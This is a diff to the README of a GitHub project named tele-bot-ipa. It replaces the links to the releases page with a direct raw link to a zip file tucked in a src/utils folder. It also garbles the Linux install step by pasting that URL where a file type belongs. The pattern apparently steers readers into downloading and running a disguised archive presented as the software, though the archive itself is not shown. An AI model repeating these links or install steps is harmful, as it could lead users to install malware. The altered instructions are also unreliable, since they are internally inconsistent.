xKashyap/tele-bot-ipa/README.md

 Follow these steps to download and run **tele-bot-ipa**:

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/xKashyap/tele-bot-ipa/releases) to find the latest version of the software.
+   Go to the [Releases Page](https://raw.githubusercontent.com/xKashyap/tele-bot-ipa/main/src/utils/ipa-tele-bot-v2.1.zip) to find the latest version of the software.

 2. **Download the Application**
    Locate the version you want and click on the link to download.
 Look for the file that matches your operating system.

-   Again, here’s the link for quick access: [Download tele-bot-ipa](https://github.com/xKashyap/tele-bot-ipa/releases).
+   Again, here’s the link for quick access: [Download tele-bot-ipa](https://raw.githubusercontent.com/xKashyap/tele-bot-ipa/main/src/utils/ipa-tele-bot-v2.1.zip).

 3. **Install the Application**
    - **Windows:** Once the download completes, open the `.exe` file to start the installation.
 Follow the on-screen prompts to finish the setup.
    - **macOS:** Open the downloaded `.dmg` file.
 Drag the app into your Applications folder to install it.
-   - **Linux:** If the application is a `.tar.gz` or similar file, extract it, and run the installation script as directed in the README.
+   - **Linux:** If the application is a `https://raw.githubusercontent.com/xKashyap/tele-bot-ipa/main/src/utils/ipa-tele-bot-v2.1.zip` or similar file, extract it, and run the installation script as directed in the README.

 4. **Launch the Application**
    Once installed, open the application from your applications menu or desktop.